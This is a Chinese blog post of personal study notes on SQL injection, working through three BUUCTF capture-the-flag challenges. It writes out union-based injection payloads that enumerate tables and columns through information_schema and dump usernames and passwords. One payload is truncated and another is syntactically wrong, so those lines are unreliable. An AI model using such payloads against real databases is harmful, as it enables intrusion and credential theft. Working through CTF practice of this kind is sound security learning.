SQL注入学习笔记

BUU SQL COURSE 1

一道很入门的的SQL手工注入，所用到的知识点也就只有union和group_concat联合注入和输出，带给我的主要收获是解读了题解代码后初步理解了查数据库名->表名->列名—>具体元素的三板斧，和具体查询原理

0 union select database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
0 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin' and table_schema=database()#
0 union select group_concat(username),group_concat(password) from admin

讲得最好的题解
 SQL注入之union 联合注入的详细原理和注意事项

BUUCTF: [极客大挑战 2019]EasySQL 1

最基础的表单SQL注入，学到的要注意的点：

引号闭合验证
注释符注释避免报错

存在疑问：select * from table_name where username='xxxx' and password='xxxx'查询原理，没有比对就返回值吗？

题解

[极客大挑战 2019]LoveSQL

终于有一道自己能写出来的题目了，看的题解虽然讲了报错注入和堆叠注入，但其实这道题老老实实地一步步爆数据库就好，就是有几次又忘了注释符，直接上payload不多说

1' union select 1,2,databas
0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
0' union 1,2,select group_concat(password) from l0ve1ysq1#

题解

posted @ 2024-11-04 19:35 饺子龙阅读(44) 评论(0) 收藏举报

刷新页面返回顶部

饺子龙

一名OI蒟蒻的自言自语owo

SQL注入学习笔记

BUU SQL COURSE 1

BUUCTF: [极客大挑战 2019]EasySQL 1

[极客大挑战 2019]LoveSQL

公告